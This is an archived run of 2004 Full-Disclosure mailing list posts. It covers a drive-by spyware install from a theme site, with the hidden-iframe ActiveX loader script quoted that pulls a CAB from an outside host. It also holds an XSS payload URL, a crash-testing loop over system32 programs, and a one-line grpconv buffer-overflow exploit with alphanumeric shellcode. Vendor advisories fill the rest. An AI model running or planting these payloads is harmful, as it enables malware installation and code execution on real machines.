>
>>Last night I went to a site that I have been to on and off for years.
The
>>page loaded and then in IE's status bar I saw something suspicious:
>>"installing components...atpartners.cab". I could not close out of IE,
and
>>I could not kill the iexplorer.exe process. It totally locked up and I
had
>>to reboot my machine. When my machine came back up, I had at least 6
>>different pieces of spyware/adware on my machine. IT took me almost 2
hrs
>>to clean up. I manually deleted a bunch of crap (stuff I had found
through
>>the run key in the registry, suspicious processes running, suspicious
>>files in the usual dir's, and by searching for all files modified at
the
>>time this happened). Even after all that, Ad-Aware found 143 entries
(none
>>were cookies, mostly registry entries and a few dll's) and then Spybot

>>found an additional 2 registry entries.
>>
>>This machine is a fully patched XP SP2 box, with the default security
>>settings for IE's Internet Zone. Does anybody know what method this
crap
>>could be using to install without any user interaction?
>>
>>_________________________________________________________________
>>Express yourself instantly with MSN Messenger! Download today - it's
FREE!
>>hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's
FREE!
hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Spyware installs with no interaction in IE on fully patchedXP SP2 box

From: Willem Koenings (iseceurope.com)
Date: Mon Oct 04 2004 - 10:40:39 CDT

hi,
 
> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab

btw, old trusty IE 5.01 + manually configured security settings =
no problem at all. either XP+SP2 broke seriously something in IE
or Geraldo Rivera has just poorly configured internet setting.

W.
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Todd Towles (toddtowlesbrookshires.com)
Date: Mon Oct 04 2004 - 10:37:05 CDT

To expand on this "About Wrap". I have posted images to this site
before....before the site went downhill. Some of the authors would allow
the site to wrap their images with ads (therefore making money for the
site). It appears they are now wrapping images with installed ad-ware.

It appears the new owners have taken it over for the money. Not the
artwork. Just my 2 cents

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> Willem Koenings
> Sent: Monday, October 04, 2004 9:55 AM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Re: Spyware installs with no
> interaction in IE on fully patched XP SP2 box
>
>
> hi,
>
> > I was unable to verify it, since I don't use IE, and would
> prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with
> the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> W.
>
>
>
> --
> ___________________________________________________________
> Sign-up for Ads Free at Mail.com
> http://promo.mail.com/adsfreejump.htm
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Gossi The Dog (gossiabate.veritynet.net)
Date: Mon Oct 04 2004 - 10:15:46 CDT

Yes... ThemeXP.org has this in the HTML..

<!-- AUTO_PROMPT AD START --><script language="JavaScript"
type="text/JavaScript
"
src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script>
<!-- AUTO_PROMPT AD END -->

Which calls...

http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js

Which contains...

                 document.write('<iframe id="downloads_manager"
style="position:a
bsolute;visibility:hidden;"></iframe>');

               document_code = '<html><head>\n';
               document_code += '<\/head><body>\n';
               document_code += '<object onerror="window.parent.retry();"
id="DDo
wnload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http:
//www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0
WIDTH=0><PARAM
NAME="AffiliateID"
VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n
';
               document_code += '<\/body><\/html>';
               downloads_manager.document.write(document_code);
               downloads_manager.document.close();

                 setCookie('minpopup80wu03rd','test',1);

...which downloads http:
//www.addictivetechnologies.net/DM0/cab/ATPartners.cab

...which means those using shitty MS browsers get owned, again.

If you want a laugh, replace the CAB files which WinVNC or somesuch.

--g

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Test your windows OS

From: KF_lists (kf_listssecnetops.com)
Date: Mon Oct 04 2004 - 11:02:11 CDT

On my win2k box with SP4
atmadm.exe crashed with the format string test.

csvde.exe ipconfig.exe ldifde.exe sort.exe all crashed on the bof test.
-KF

Berend-Jan Wever wrote:
> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what there doing ? Run these commands from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory, most of them will either ignore the parameter or report an error because the parameter doesn't make sence... But on my win2k system I found 6 programs vulnerable to these very simple formatsting and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in itself: you cannot gain access or elevate priviledges but I just wanted to let you know that these programmers did a sloppy job.
>
> Cheers,
> SkyLined
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Test your windows OS

From: Alex (alexindefrogers.com)
Date: Mon Oct 04 2004 - 12:03:08 CDT

Oooo my...
Got around 12 of win32 executable crashes on my Win2K server with all
patches...
This is much better tool that MS Baseline Security analyzer :-(

----- Original Message -----
From: "Berend-Jan Wever" <skylinededup.tudelft.nl>
To: <full-disclosurelists.netsys.com>
Sent: Monday, October 04, 2004 11:39 AM
Subject: [Full-Disclosure] Test your windows OS

> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows
operating system have any clue as to what there doing ? Run these commands
from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as
cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory, most
of them will either ignore the parameter or report an error because the
parameter doesn't make sence... But on my win2k system I found 6 programs
vulnerable to these very simple formatsting and BoF tests.... grpconv even
gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in itself: you cannot gain access or elevate
priviledges but I just wanted to let you know that these programmers did a
sloppy job.
>
> Cheers,
> SkyLined
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-02 ] Netpbm: Multiple temporary file issues

From: Thierry Carrez (koongentoo.org)
Date: Mon Oct 04 2004 - 12:25:55 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Netpbm: Multiple temporary file issues
      Date: October 04, 2004
      Bugs: #65647
        ID: 200410-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Utilities included in old Netpbm versions are vulnerable to multiple
temporary files issues, potentially allowing a local attacker to
overwrite files with the rights of the user running the utility.

Background
==========

Netpbm is a toolkit containing more than 200 separate utilities for
manipulation and conversion of graphic images.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-libs/netpbm <= 9.12-r4 >= 10.0

Description
===========

Utilities contained in the Netpbm package prior to the 9.25 version
contain defects in temporary file handling. They create temporary files
with predictable names without checking first that the target file
doesn't already exist.

Impact
======

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When a
user or a tool calls one of the affected utilities, this would result
in file overwriting with the rights of the user running the utility.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Netpbm users should upgrade to an unaffected version:

    # emerge sync

    # emerge -pv ">=media-libs/netpbm-10.0"
    # emerge ">=media-libs/netpbm-10.0"

References
==========

  [ 1 ] CVE-2003-0924
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0924
  [ 2 ] US-CERT VU#487102
        http://www.kb.cert.org/vuls/id/487102

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [suse-security] Anti-Virus Problem

From: Björn Scorey (bjornscoreyhotmail.com)
Date: Mon Oct 04 2004 - 12:33:18 CDT

Hi Everyone !

I am running Suse 9.0 and I have installed

qmail (netqmail Ver. 1.05)
amavis (amavis-new Ver. 20030616p5-23)
antivir (Ver 2.08-16)

Antivir seems to be an evaluation version. (The one that came with Suse 9.0)

I donwloaded the EICAR E-Mail Test Virus but when I send either an infected attachment or simply copy the virus string on the mail, the antivirus doesn't recognize the virus, and the mail passes normally.

However when I run antivir on the infected file (attachment) by itself, it recognizes the virus. The same occured with f-prot (however I got some minor errors while installing f-prot). When I run either anti-virus scanner on my mailbox (mbox), none of them manage to see the virus.

Anyone has an idea what's wrong ?

Regards
Björn

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Shows when no limits are set or restricted shell or bat access

From: KF_lists (kf_listssecnetops.com)
Date: Mon Oct 04 2004 - 14:38:49 CDT

I do not believe the point was to show that you can chew up system
resources... although that IS a side effect. That was not the point.

Add a sleep statement in there if it makes you feel better.
-KF

Clairmont, Jan M wrote:
>
> ;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> ;;for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as ;;much "A"-s as cmd.exe allows on one line.)
>
>
> Any system UNIX at least use to churn and eat system resources with a spawned
> shell, this is not new on any system. With unlimited program execution you can
> lock almost any system with a repeating shell program, but cute anyway.8->
>
>
> Jan Clairmont
> Unix Security Support/Consultant
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Shows when no limits are set or restricted shell or bat access

From: Clairmont, Jan M (jan.m.clairmontcitigroup.com)
Date: Mon Oct 04 2004 - 14:08:40 CDT

;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
;;for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as ;;much "A"-s as cmd.exe allows on one line.)

Any system UNIX at least use to churn and eat system resources with a spawned
shell, this is not new on any system. With unlimited program execution you can
lock almost any system with a repeating shell program, but cute anyway.8->

Jan Clairmont
Unix Security Support/Consultant
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Test your windows OS

From: Sean Crawford (sean01accnet.com.au)
Date: Mon Oct 04 2004 - 14:06:31 CDT

Alex Wrote-------------->

---> Oooo my...
---> Got around 12 of win32 executable crashes on my Win2K server with all
---> patches...
---> This is much better tool that MS Baseline Security analyzer :-(

Alex I don't know why you would run it on a working server??.....did you
want to reboot anyway or something?.

It's not exactly pen testing..

So what did you learn?

Thanks.
Sean.

---> From: "Berend-Jan Wever" <skylinededup.tudelft.nl>
---> To: <full-disclosurelists.netsys.com>
---> Sent: Monday, October 04, 2004 11:39 AM
---> Subject: [Full-Disclosure] Test your windows OS
--->
--->
---> > Hi all,
---> >
---> > Wanna do a quick test to see if the programmers that wrote
---> your windows
---> operating system have any clue as to what there doing ? Run
---> these commands
---> from cmd.exe in the system32 directory:
---> >
---> > for %i in (*.exe) do start %i
---> %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
---> > for %i in (*.exe) do start %i
---> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as
---> cmd.exe allows on one line.)
---> >
---> > Each command will execute every program in your system32
---> directory, most
---> of them will either ignore the parameter or report an error because the
---> parameter doesn't make sence... But on my win2k system I found
---> 6 programs
---> vulnerable to these very simple formatsting and BoF tests....
---> grpconv even
---> gives EIP 0x00410041, can it be any easier?
---> >
---> > These are not vulnerabilities in itself: you cannot gain
---> access or elevate
---> priviledges but I just wanted to let you know that these
---> programmers did a
---> sloppy job.
---> >
---> > Cheers,
---> > SkyLined

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re[2]: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV]

From: Kolja Powischer (ultorgmx.net)
Date: Mon Oct 04 2004 - 14:38:56 CDT

Hi group,

> I don't think your super AV will detect the "eicar
> test string file" withing "NULL.con" folder??? :)

My AV detected the string... www.free-av.de H+BEDV Datentechnick GmbH.

> anyways... let me know HOW? when you figure out to how
> to delete "NULL.con" directory.

Ok, how to delete that crap? Any idea?
Is it an NTFS error? I don't think so, because I wrote that directory
to a FAT32 filesystem...

bye
Kolja

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] XSS in "Spyware installs with no interaction in IE on fully patchedXP SP2 box"

From: jamie fisher (contact_jamie_fisheryahoo.co.uk)
Date: Mon Oct 04 2004 - 14:37:13 CDT

"'>&view=date&page=&cat=&name=blue+biohazard.zip">http://themexp.org//preview.php?mid=72936&type=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;poo%26quot;)>&view=date&page=&cat=&name=blue+biohazard.zip
 
Above is a measly example of XSS - upload any file you like if you want to the site with XSS; seems to be open to all sorts - but I just spidered the web app and there appears to be quite a number of scripts that are pushing the applications down your wire... Not 100% sure but I'd guess that since this is seems to be the sort of site people would visit to get their windows wares it stands to reason that someone would upload a file like in the example above in order to do... I haven't had the opportunity to see where the .cab is being pushed from - whether on site or off. Would it be worth investigating?
 
Cheers

Willem Koenings <iseceurope.com> wrote:

hi,

> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab

btw, old trusty IE 5.01 + manually configured security settings =
no problem at all. either XP+SP2 broke seriously something in IE
or Geraldo Rivera has just poorly configured internet setting.

W.
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

                
---------------------------------
 ALL-NEW Yahoo! Messenger - all new features - even more fun!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1947 - 18 msgs

From: RMueller (randallmfidmail.com)
Date: Mon Oct 04 2004 - 15:27:00 CDT

Gossi wrote:

--__--__--

Message: 12
Date: Mon, 4 Oct 2004 10:15:46 -0500 (CDT)
From: Gossi The Dog <gossiabate.veritynet.net>
To: toddtowlesbrookshires.com, keydet89yahoo.com,
   full-disclosurelists.netsys.com
Cc: joelhelgeson.com, iamafraudhotmail.com
Subject: RE: [Full-Disclosure] Spyware installs with no interaction in IE on
 fully patched XP SP2 box

If you want a laugh, replace the CAB files which WinVNC or somesuch.

--g

--__--__--
 
 No that's not funny!! :)

I could not get anything to happen to my box which runs XP2 and google
blocker until I went to a page inside. Google showed no change in blocks but
IE showed warning of block and I found nothing in McAfee 8.0 or anything in
the logs. I didn't download anything though.

thanks
Randall

___________________________________________________________
Fidelity Communications Webmail - http://webmail.fidnet.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: Re[2]: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV]

lee.e.riancensus.gov
Date: Mon Oct 04 2004 - 15:27:26 CDT

>Ok, how to delete that crap? Any idea?

from http://www.ss64.com/nt/del.html
Files are sometimes created with the reserved names: CON, AUX, COM1, COM2,
COM3, COM4, LPT1, LPT2, LPT3, PRN, NUL
To delete these use the syntax: DEL \\.\C:\somedir\LPT1

same idea using RMDIR to get rid of the directory

|---------+-------------------------------------->
| | Kolja Powischer |
| | <ultorgmx.net> |
| | Sent by: |
| | full-disclosure-adminlists|
| | .netsys.com |
| | |
| | |
| | 10/04/2004 03:38 PM |
| | Please respond to Kolja |
| | Powischer |
| | |
|---------+-------------------------------------->
>---------------------------------------------------------------------------------------------------------------------------------------------|
  | |
  | To: full-disclosurelists.netsys.com |
  | cc: |
  | Subject: Re[2]: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV] |
>---------------------------------------------------------------------------------------------------------------------------------------------|

Hi group,

> I don't think your super AV will detect the "eicar
> test string file" withing "NULL.con" folder??? :)

My AV detected the string... www.free-av.de H+BEDV Datentechnick GmbH.

> anyways... let me know HOW? when you figure out to how
> to delete "NULL.con" directory.

Ok, how to delete that crap? Any idea?
Is it an NTFS error? I don't think so, because I wrote that directory
to a FAT32 filesystem...

bye
Kolja

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] FreeBSD Security Advisory FreeBSD-SA-04:15.syscons

From: FreeBSD Security Advisories (security-advisoriesfreebsd.org)
Date: Mon Oct 04 2004 - 15:54:12 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-04:15.syscons Security Advisory
                                                          The FreeBSD Project

Topic: Boundary checking errors in syscons

Category: core
Module: sys_dev_syscons
Announced: 2004-10-04
Credits: Christer Oberg
Affects: FreeBSD 5.x releases
Corrected: 2004-09-30 17:49:15 UTC (RELENG_5, 5.3-BETA6)
                2004-10-04 17:04:25 UTC (RELENG_5_2, 5.2.1-RELEASE-p11)
CVE Name: CAN-2004-0919
FreeBSD only: YES

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
<URL:http://www.freebsd.org/security/>.

I. Background

syscons(4) is the default console driver for FreeBSD. Using the
physical keyboard and screen, it provides multiple virtual terminals
which appear as if they were separate terminals. One virtual terminal
is considered current and exclusively occupies the screen and the
keyboard; the other virtual terminals are placed in the background.

II. Problem Description

The syscons CONS_SCRSHOT ioctl(2) does insufficient validation of
its input arguments. In particular, negative coordinates or large
coordinates may cause unexpected behavior.

III. Impact

It may be possible to cause the CONS_SCRSHOT ioctl to return portions of
kernel memory. Such memory might contain sensitive information, such as
portions of the file cache or terminal buffers. This information might
be directly useful, or it might be leveraged to obtain elevated
privileges in some way. For example, a terminal buffer might include a
user-entered password.

IV. Workaround

There is no known workaround. However, this bug is only exploitable
by users who have access to the physical console or can otherwise open
a /dev/ttyv* device node.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to the RELENG_5_2 security branch
dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.2
systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:15/syscons.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:15/syscons.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.freebsd.org/handbook/kernelconfig.html> and reboot the
system.

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch Revision
  Path
- -------------------------------------------------------------------------
RELENG_5_2
  src/UPDATING 1.282.2.19
  src/sys/conf/newvers.sh 1.56.2.18
  src/sys/dev/syscons/syscons.c 1.409.2.1
- -------------------------------------------------------------------------

VII. References

<URL:http://cvsweb.freebsd.org/src/sys/dev/syscons/syscons.c.diff?r1=1.428&r2=1.429>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFBYYMTFdaIBMps37IRAuNbAJ4jbPnqo3vvEeD33ItW09r3zAuh5QCghq5v
SN4Y+OCpzJ7Szy3s++slzeQ=
=FlYi
-----END PGP SIGNATURE-----
_______________________________________________
freebsd-security-notificationsfreebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security-notifications
To unsubscribe, send any mail to "freebsd-security-notifications-unsubscribefreebsd.org"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Test your windows OS

From: Berend-Jan Wever (skylinededup.tudelft.nl)
Date: Mon Oct 04 2004 - 18:08:51 CDT

Anybody wanna try if this shows a popup ? It's 1 line, if it wraps put it back together:
-------------------------------
set !!!!!!=YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLP1WPQT4K10P04KOPLLDKBPMLVMTKBHLH2HRLRLKPKPRH03P2NN1T2H3EBSQURRPT7K2QEWK8KN9X21KPKPKPSYZOTIWUNQYB0RK8MPKPKPM0Q1RLBLMPD9ROSE2RO0S2QQT3QUMP1QBRQUMPQR1U2L2O2NC7O0RTROMPBURSMQKPYXLTKPKPM0R3BKD90LS9RNQURDMPBP3G2N1UQTMPBY2OBUMQKPPR7KZBLLI9JZ9XKQKPKPM0HLQFPWTKQ5OLDKPTKUT8M1YZQB4K22MPKQIZNQI0NQ99OQDKP4DJM1JNP1KOWQ8OMCVLM1XGU5WPSEKFNY9ORUIZ1J4KQJNDKQJKS6TKLLPKDKPZMLKQJKDKKTTKKQYX1OQNKOYPA && %SystemRoot%\system32\grpconv AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
 AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ^N^A^N^A-------------------------------
Let me know if it works (off-list) and what system you're using. I developed it on win2ken sp4.
Tech stuff:
The string "^N^A^N^A" at the end should be typed "ctrl+N, ctrl+A, ctrl+N, ctrl+A". It works by installing a unicode shellcode in the environment string "!!!!!!" at 0x00010000. This should alphabetically be the first string so the shellcode should be at 0x0001000e. I overwrite a return address (^N^A=0x0001000e). The unicode shellcode needs to know it's own baseaddress, that's why there's "^N^A" twice: the first one is used to return, the second one is poped of by the shellcode to get the baseaddress.

Cheers,
SkyLined

----- Original Message -----
From: "Berend-Jan Wever" <skylinededup.tudelft.nl>
To: <full-disclosurelists.netsys.com>
Sent: Monday, October 04, 2004 17:39
Subject: [Full-Disclosure] Test your windows OS

> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what there doing ? Run these commands from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as much "A"-s as cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory, most of them will either ignore the parameter or report an error because the parameter doesn't make sence... But on my win2k system I found 6 programs vulnerable to these very simple formatsting and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in itself: you cannot gain access or elevate priviledges but I just wanted to let you know that these programmers did a sloppy job.
>
> Cheers,
> SkyLined
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: On Polymorphic Evasion (an alphanumeric version)

From: m conover (mconover_001hotmail.com)
Date: Mon Oct 04 2004 - 20:39:15 CDT

Cool. I will also add to the discussion with an alphanumeric version written
with two others for experimentation, though it is limited in it doesn't vary
the length of the decoder stubs or encoded shellcode. spoonm is doing a
separate version--I think based on Berend's alpha--that will. Also, I did
not test it against any of the different shellcode detectors like Fnord, so
I would be curious to know if anyone tries. IMO "as to whether the detection
of polymorphic shellcode was indeed an appropriate component of an IDS", I
think there is enough prior art on it that it's not really a big deal to
publish or discuss code implementing it. It most likely better to have a
variety of generators to test the effectiveness of a shellcode detector. I
added a small blurb on addtional options for OS-independence with
alphanumeric shellcode for IA-32e/AMD-64 since it adds the new RIP-relative
addressing. See attachment.

>"Phantasmal Phantasmagoria" <phantasmalhush.ai>
>10/01/2004 05:28 PM
>Please respond to
>phantasmalhush.ai
>
>
>To
>full-disclosurelists.netsys.com, bugtraqsecurityfocus.com,
>focus-idssecurityfocus.com
>cc
>
>Subject
>On Polymorphic Evasion
>
>
>
>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>- ------------------------------------
>
>On Polymorphic Evasion
>by Phantasmal Phantasmagoria
>phantasmalhush.ai

_________________________________________________________________
On the road to retirement? Check out MSN Life Events for advice on how to
get there! http://lifeevents.msn.com/category.aspx?cid=Retirement

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re:[Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: devis (deviseasynix.net)
Date: Mon Oct 04 2004 - 20:34:18 CDT

<cruncher:~/jpegs > file
ATPartners.cab
[ 3:25AM]
ATPartners.cab: Microsoft Cabinet file, 52795 bytes, 2 files
<cruncher:~/jpegs > cabextract
ATPartners.cab
[ 3:25AM]
ATPartners.cab: WARNING; possible 5688 extra bytes at end of file.
Extracting cabinet: ATPartners.cab
  extracting ATPartners.inf
  extracting ATPartners.dll

All done, no errors.
<cruncher:~/jpegs > more
ATPartners.inf
            [ 3:25AM]
[version]
signature="$CHICAGO$"
AdvancedINF=2.0

[DefaultInstall]
CopyFiles=CopySystemFiles
RegisterOCXs=RegisterOCXSection
AddReg=RegistryEntries
RegisterDlls=RegDlls

[CopySystemFiles]
